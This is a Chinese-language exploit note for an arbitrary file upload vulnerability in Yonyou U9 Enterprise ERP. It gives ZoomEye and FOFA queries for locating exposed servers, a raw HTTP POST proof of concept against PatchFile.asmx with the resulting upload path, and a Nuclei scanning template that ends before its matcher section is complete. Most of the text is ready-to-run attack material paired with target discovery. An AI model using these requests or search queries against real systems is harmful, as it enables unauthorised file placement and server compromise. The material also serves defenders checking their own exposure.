## 用友系统-U9企业版存在任意文件上传漏洞
## ZoomEye
```
app:"用友 U9"
```
## fofa
```
title==" U9-登录 "
```
## poc
```
POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host: {}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4n
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 433
VXBsb2FkLXN1Y2Nlc3NmdWxseQ==
./
123.txt
```
文件上传路径
http://127.0.0.1/CS/Office/AutoUpdates/123.txt
## Nuclei
```
id: yonyou-U9-PatchFile-asmx-uploadfile
info:
name: yonyou-U9-PatchFile-asmx-uploadfile
author: 渗透安全HackTwo
severity: high
description: |
漏洞测试-公众号-渗透安全HackTwo
reference:
- https://127.0.0.1
tags: auto
variables:
filename: "{{to_lower(rand_base(10))}}"
boundary: "{{to_lower(rand_base(20))}}"
http:
- raw:
- |
POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1
Host:{{Hostname}}
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: text/xml; charset=utf-8
Connection: close
VXBsb2FkLXN1Y2Nlc3NmdWxseQ==
./
{{filename}}.txt
- |
GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
matchers:
- type: dsl
dsl:
```